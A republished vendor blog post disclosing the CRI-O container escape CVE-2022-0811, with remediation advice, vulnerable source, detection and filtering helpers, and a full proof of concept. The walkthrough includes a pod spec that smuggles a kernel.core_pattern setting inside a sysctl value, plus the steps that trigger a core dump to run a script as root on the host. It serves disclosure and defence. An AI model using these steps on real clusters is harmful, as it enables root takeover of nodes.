cr8escape: New Vulnerability in CRI-O Container Engine Discovered by CrowdStrike (CVE-2022-0811)
Published 06/03/2022
This blog was originally published by CrowdStrike on March 15, 2022.
Written by John Walker and Manoj Ahuje, CrowdStrike.
- CrowdStrike cloud security researchers discovered a new vulnerability (dubbed “cr8escape” and tracked as CVE-2022-0811) in the Kubernetes container engine CRI-O.
- CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today.
- It is recommended that CRI-O users patch immediately.
Summary
CrowdStrike’s Cloud Threat Research team discovered a new vulnerability (CVE-2022-0811), dubbed “cr8escape,” in CRI-O (a container runtime engine underpinning Kubernetes). By exploiting it, an attacker could escape from a Kubernetes container, gain root access to the host and move anywhere in the cluster. Exploitation of CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.
CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today. The CVE score is 8.8 (High) and the potential impact is widespread, as many software products and platforms use CRI-O by default. It is recommended that CRI-O users patch immediately.
Kubernetes uses a container runtime like CRI-O or Docker to safely share each node’s kernel and resources with the various containerized applications running on it. The Linux kernel accepts runtime parameters that control its behavior. Some parameters are namespaced and can therefore be set in a single container without impacting the system at large. Kubernetes and the container runtimes it drives allow pods to update these “safe” kernel settings while blocking access to others.
CrowdStrike’s Cloud Threat Research team discovered a flaw introduced in CRI-O version 1.19 that allows an attacker to bypass these safeguards and set arbitrary kernel parameters on the host. As a result of CVE-2022-0811, anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime can abuse the “kernel.core_pattern” parameter to achieve container escape and arbitrary code execution as root on any node in the cluster.
Impact
Directly Affected Software
- CRI-O version 1.19+
To determine if a host is affected, run: crio --version
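The version check can be scripted. The Go sketch below is a minimal illustration, not an official tool: it extracts the first major.minor pair from whatever text the version command prints and reports whether it falls in the 1.19+ range named above. The sample strings in main are assumed output shapes, and the check does not know which point releases carry the fix, so a "true" result means "check the release notes" rather than "definitely vulnerable."

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
)

// versionRe pulls the first "major.minor" pair out of free-form text.
var versionRe = regexp.MustCompile(`(\d+)\.(\d+)`)

// inAffectedRange reports whether the version found in text is 1.19 or later.
// It only looks at major and minor; patched point releases are NOT detected.
func inAffectedRange(text string) (bool, error) {
	m := versionRe.FindStringSubmatch(text)
	if m == nil {
		return false, fmt.Errorf("no version found in %q", text)
	}
	major, err := strconv.Atoi(m[1])
	if err != nil {
		return false, err
	}
	minor, err := strconv.Atoi(m[2])
	if err != nil {
		return false, err
	}
	return major > 1 || (major == 1 && minor >= 19), nil
}

func main() {
	// Assumed sample strings; paste the real output of the version command here.
	for _, out := range []string{"crio version 1.22.0", "crio version 1.18.4"} {
		affected, err := inAffectedRange(out)
		fmt.Println(out, "->", affected, err)
	}
}
```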
Indirectly Affected Software and Platforms
While the vulnerability is in CRI-O, software and platforms that depend on it are also likely to be vulnerable, including:
- OpenShift 4+
- Oracle Container Engine for Kubernetes
Remediation
At the Kubernetes level:
- Ideal: Use policies to block pods that contain sysctl settings with “+” or “=” in their value.
- Less ideal alternative: Use the PodSecurityPolicy forbiddenSysctls field to block all sysctls (it’s necessary to block all sysctls as the malicious setting is smuggled in a value).
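The "ideal" policy above boils down to a simple check on each sysctl value. As a rough sketch of that logic (the Sysctl type and function name here are hypothetical, not the Kubernetes API types or any particular policy engine), it could look like this in Go:

```go
package main

import (
	"fmt"
	"strings"
)

// Sysctl mirrors a name/value pair from a pod's securityContext.sysctls.
// Hypothetical local type for illustration; not the Kubernetes API type.
type Sysctl struct {
	Name  string
	Value string
}

// findSmuggledSysctls returns the names of sysctls whose value contains
// '+' or '=', the two characters needed to smuggle an extra setting.
func findSmuggledSysctls(sysctls []Sysctl) []string {
	var bad []string
	for _, s := range sysctls {
		if strings.ContainsAny(s.Value, "+=") {
			bad = append(bad, s.Name)
		}
	}
	return bad
}

func main() {
	pod := []Sysctl{
		{Name: "net.ipv4.ip_local_port_range", Value: "1024 65535"},
		// Placeholder handler path, shortened for readability.
		{Name: "kernel.shm_rmid_forced", Value: "1+kernel.core_pattern=|/tmp/handler #"},
	}
	fmt.Println("rejected sysctls:", findSmuggledSysctls(pod))
}
```

A real deployment would express the same rule in whatever admission policy mechanism the cluster already uses; the point is only that the check applies to the value, not the name.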
At the CRI-O level:
- Upgrade to a patched version of CRI-O.
- Set pinns_path in crio.conf to point to a pinns wrapper that strips the “-s” option before invoking the real pinns. This will prevent pods from updating any kernel parameters, including sensitive ones.
- Pinns, typically found at /usr/bin/pinns, is the utility CRI-O uses to set kernel parameters.
- Downgrade to CRI-O version 1.18 or earlier. (Not recommended in most cases.)
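For the pinns wrapper option, the core of the wrapper is an argument filter. The Go sketch below is one possible shape, under stated assumptions: the real binary has been moved to /usr/bin/pinns.real (a hypothetical path), and CRI-O passes the option as a separate "-s" followed by its value, as in the invocation shown in this post. Other spellings of the option, if any exist, are not handled and should be verified against the installed pinns before relying on this.

```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

// realPinns is a hypothetical location for the original pinns binary
// after it has been moved aside to make room for the wrapper.
const realPinns = "/usr/bin/pinns.real"

// stripSysctlOption removes every "-s <value>" pair from args.
func stripSysctlOption(args []string) []string {
	out := make([]string, 0, len(args))
	for i := 0; i < len(args); i++ {
		if args[i] == "-s" {
			i++ // also skip the value that follows -s
			continue
		}
		out = append(out, args[i])
	}
	return out
}

func main() {
	argv := append([]string{realPinns}, stripSysctlOption(os.Args[1:])...)
	// Replace this process with the real pinns, keeping the environment.
	if err := syscall.Exec(realPinns, argv, os.Environ()); err != nil {
		fmt.Fprintln(os.Stderr, "exec pinns:", err)
		os.Exit(1)
	}
}
```

With the wrapper built and installed, pinns_path in crio.conf would point at the wrapper binary instead of the original.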
Vulnerability Details
Starting with this commit, CRI-O uses the pinns utility to set kernel options for a pod. Pinns is most commonly invoked like this:
pinns -s kernel_parameter1=value1+kernel_parameter2=value2
Due to the addition of sysctl support in version 1.19, pinns will now blindly set any kernel parameters it’s passed without validation.
The following function converts the map of sysctl settings passed to CRI-O into a pinns argument. Like pinns, it does not validate the settings.
func getSysctlForPinns(sysctls map[string]string) string {
	// this assumes there's no sysctl with a `+` in it
	const pinnsSysctlDelim = "+"
	g := new(bytes.Buffer)
	for key, value := range sysctls {
		fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim)
	}
	return strings.TrimSuffix(g.String(), pinnsSysctlDelim)
}
Validation does occur before this function is invoked. However, note that the value is not checked or sanitized. As long as the sysctl key is valid, it will be processed as is.
func (s *Sysctl) Validate(hostNet, hostIPC bool) error {
	nsErrorFmt := "%q not allowed with host %s enabled"
	if ns, found := namespaces[s.Key()]; found {
		if ns == IpcNamespace && hostIPC {
			return errors.Errorf(nsErrorFmt, s.Key(), ns)
		}
		return nil
	}
	for p, ns := range prefixNamespaces {
		if strings.HasPrefix(s.Key(), p) {
			if ns == IpcNamespace && hostIPC {
				return errors.Errorf(nsErrorFmt, s.Key(), ns)
			}
			if ns == NetNamespace && hostNet {
				return errors.Errorf(nsErrorFmt, s.Key(), ns)
			}
			return nil
		}
	}
	return errors.Errorf("%s not whitelisted", s.Key())
}
The result: A malicious user can pass in sysctl values with + and = characters allowing extra kernel settings to be set through pinns.
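To make the smuggling concrete, the sketch below feeds a single, valid-looking sysctl through getSysctlForPinns as excerpted above, then splits the result the way a "+"-delimited parser would. splitLikePinns is a hypothetical, simplified stand-in for the pinns parser (it is not the pinns source), and the handler path is a placeholder.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
)

// getSysctlForPinns is the function from the excerpt above, reproduced as-is.
func getSysctlForPinns(sysctls map[string]string) string {
	const pinnsSysctlDelim = "+"
	g := new(bytes.Buffer)
	for key, value := range sysctls {
		fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim)
	}
	return strings.TrimSuffix(g.String(), pinnsSysctlDelim)
}

// splitLikePinns is a hypothetical stand-in for the pinns parser: it splits
// the argument on '+', then each piece on the first '=', and drops a leading
// quote from the key. The real parser may differ in detail.
func splitLikePinns(arg string) [][2]string {
	var settings [][2]string
	for _, kv := range strings.Split(arg, "+") {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 {
			continue
		}
		settings = append(settings, [2]string{strings.TrimPrefix(parts[0], "'"), parts[1]})
	}
	return settings
}

func main() {
	// One sysctl goes in; the key is on the allowed list.
	arg := getSysctlForPinns(map[string]string{
		"kernel.shm_rmid_forced": "1+kernel.core_pattern=|/tmp/handler #",
	})
	fmt.Println("pinns -s", arg)
	// Two settings come out once the argument is split on '+'.
	for _, s := range splitLikePinns(arg) {
		fmt.Printf("%s = %q\n", s[0], s[1])
	}
}
```

Only the key kernel.shm_rmid_forced ever passes through Validate; the second setting exists solely inside the value and is never checked.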
Proof of Concept: Leveraging CVE-2022-0811 to Compromise Kubernetes
Overview
This proof of concept (POC) uses a malicious PodSpec to set the kernel.core_pattern kernel parameter, which specifies how the kernel should react to a core dump. In this case, we’ll tell it to execute a binary hosted in another pod. That binary will be run as root outside of any container. Finally, we’ll trigger a core dump causing the kernel to invoke the malicious executable.
Reproduction Environment for POC
- Minikube cluster created via minikube start --kubernetes-version=v1.23.3 --driver=vmware --container-runtime=crio running:
- Kubernetes v1.23.3
- CRI-O 1.22.0 (Later versions are vulnerable as well; this just happens to be the version of CRI-O Minikube installs.)
Steps
Startup Pod to Host Malicious Executable
This pod will host an executable that the kernel will invoke after a core dump. It will also be used to trigger a core dump.
❯ cat ./malicious-script-host.yaml
apiVersion: v1
kind: Pod
metadata:
  name: malicious-script-host
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
❯ kubectl create -f ./malicious-script-host.yaml
pod/malicious-script-host created
Determine Root Path From Host Mount Namespace
Ultimately the kernel will be invoking a script in this pod in response to a core dump. The kernel will be acting in the host mount namespace, so we need to determine the path to the container filesystem from this namespace.
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/containers/storage/overlay/l/VSOA5NIR3Y3ACHBH662FOSL4J2,upperdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff,workdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/work)
…
/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff is the path to the root of the container from the perspective of the kernel.
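Picking the upperdir value out of the mount output by eye is error-prone given the length of the path. A small Go helper along the following lines could do it; this is an illustrative sketch, and the ID and LOWER path components in the sample line are placeholders rather than real identifiers.

```go
package main

import (
	"fmt"
	"strings"
)

// upperDir extracts the upperdir option from one line of mount output,
// e.g. "overlay on / type overlay (rw,...,upperdir=/path/diff,...)".
func upperDir(mountLine string) (string, bool) {
	start := strings.Index(mountLine, "(")
	end := strings.LastIndex(mountLine, ")")
	if start < 0 || end < start {
		return "", false
	}
	// Mount options are comma-separated inside the parentheses.
	for _, opt := range strings.Split(mountLine[start+1:end], ",") {
		opt = strings.TrimSpace(opt)
		if strings.HasPrefix(opt, "upperdir=") {
			return strings.TrimPrefix(opt, "upperdir="), true
		}
	}
	return "", false
}

func main() {
	// Placeholder line; ID and LOWER stand in for the real directory names.
	line := "overlay on / type overlay (rw,relatime," +
		"lowerdir=/var/lib/containers/storage/overlay/l/LOWER," +
		"upperdir=/var/lib/containers/storage/overlay/ID/diff," +
		"workdir=/var/lib/containers/storage/overlay/ID/work)"
	if dir, ok := upperDir(line); ok {
		fmt.Println("container root as seen from the host:", dir)
	}
}
```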
Create a Malicious Script to Invoke on Core Dump
Within our malicious script host pod:
/ # ls -l /malicious.sh
-rwxr-xr-x 1 root root 256 Feb 23 14:00 /malicious.sh
/ # cat /malicious.sh
#!/bin/sh
date >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
whoami >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
hostname >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
# important – ensures file is readable within container
/ # touch /output
/ # cat /output
We now have a malicious script set up and we know its path in the host mount namespace.
Use Second Pod to Point Core Pattern to Malicious Script
Next, we attempt to create a second pod. Creation will stall, but as a result of the attempt, the CRI-O daemon will update the value of the kernel.core_pattern setting, which controls what the kernel does in response to core dumps. In this case, we’ll tell the kernel to send the core dump to our malicious script.
NOTE: You must ensure this pod runs on the same node as the malicious script pod. There are multiple ways to do this depending on the exact cluster setup. A primitive, brute-force method is to spin it up as a DaemonSet, which will update core_pattern for every node in the cluster.
❯ cat ./sysctl-set.yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
    sysctls:
    - name: kernel.shm_rmid_forced
      value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
❯ kubectl create -f ./sysctl-set.yaml
pod/sysctl-set created
❯ kubectl get pods
NAME                    READY   STATUS              RESTARTS   AGE
malicious-script-host   1/1     Running             0          14m
sysctl-set              0/1     ContainerCreating   0          68s
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /proc/sys/kernel/core_pattern
|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #'
While the sysctl-set pod did not start, it successfully updated the node-wide core_pattern to point into our malicious-script-host container.
This works because both Kubernetes and CRI-O sysctl validation logic believe the user is updating only the safe kernel parameter “kernel.shm_rmid_forced.” When CRI-O actually applies this setting, though, its parser will expand it into two kernel parameter updates:
kernel.shm_rmid_forced=1
kernel.core_pattern=|<path to malicious script> #'
This second option has not been validated or sanitized in any way. (NOTE: The trailing # is to ignore the single quote CRI-O adds to the end of the value.)
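Because the smuggled value begins with a pipe character, the kernel treats the rest of core_pattern as the command line of a program to run on each core dump (this behavior is described in the core(5) manual page). One way to spot the result on a node is to read the setting back and look at where the handler lives. The Go sketch below is a heuristic of our own for illustration, not part of any CrowdStrike tooling; the overlayRoot prefix is taken from the paths in this walkthrough and is an assumption about the node's storage layout.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// overlayRoot is the container storage prefix seen in this walkthrough.
// Assumption: other nodes may keep container storage elsewhere.
const overlayRoot = "/var/lib/containers/storage/overlay/"

// pipeHandler returns the program path when pattern has the form
// "|program args...", which tells the kernel to pipe core dumps to it.
func pipeHandler(pattern string) (string, bool) {
	pattern = strings.TrimRight(pattern, "\n")
	if !strings.HasPrefix(pattern, "|") {
		return "", false
	}
	fields := strings.Fields(pattern[1:])
	if len(fields) == 0 {
		return "", false
	}
	return fields[0], true
}

// suspicious reports whether the core dump handler sits inside container
// overlay storage, where a pod could have planted it.
func suspicious(pattern string) bool {
	prog, ok := pipeHandler(pattern)
	return ok && strings.HasPrefix(prog, overlayRoot)
}

func main() {
	data, err := os.ReadFile("/proc/sys/kernel/core_pattern")
	if err != nil {
		fmt.Fprintln(os.Stderr, "read core_pattern:", err)
		return
	}
	pattern := strings.TrimRight(string(data), "\n")
	fmt.Printf("core_pattern=%q suspicious=%v\n", pattern, suspicious(pattern))
}
```

A handler outside overlay storage is not necessarily benign, so this is a narrow check for the specific technique shown here.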
Trigger Core Dump
We need to trigger a core dump to cause the kernel to execute our malicious core dump handler.
First enable core dumps:
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # ulimit -c unlimited
/ # ulimit -c
unlimited
Now trigger one:
/ # tail -f /dev/null &
/ # ps
PID   USER     TIME  COMMAND
    1 root      0:00 tail -f /dev/null
   34 root      0:00 /bin/sh
   42 root      0:00 tail -f /dev/null
   43 root      0:00 ps
/ # kill -SIGSEGV 42
/ # [1]+  Segmentation fault (core dumped) tail -f /dev/null
Verify Malicious Script Ran
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /output
Wed Feb 23 14:20:07 UTC 2022
root
minikube
This script was invoked by the kernel outside of the container namespace with root privileges. A real attacker could, as an example, run a reverse shell and gain full control of the node.
Notes
Kubernetes is not necessary to exploit CVE-2022-0811. An attacker on a machine with CRI-O installed can use CRI-O on its own to set kernel parameters. We used Kubernetes in this POC to better illustrate the potential impact of the problem and to more closely simulate how this would likely be used in the wild.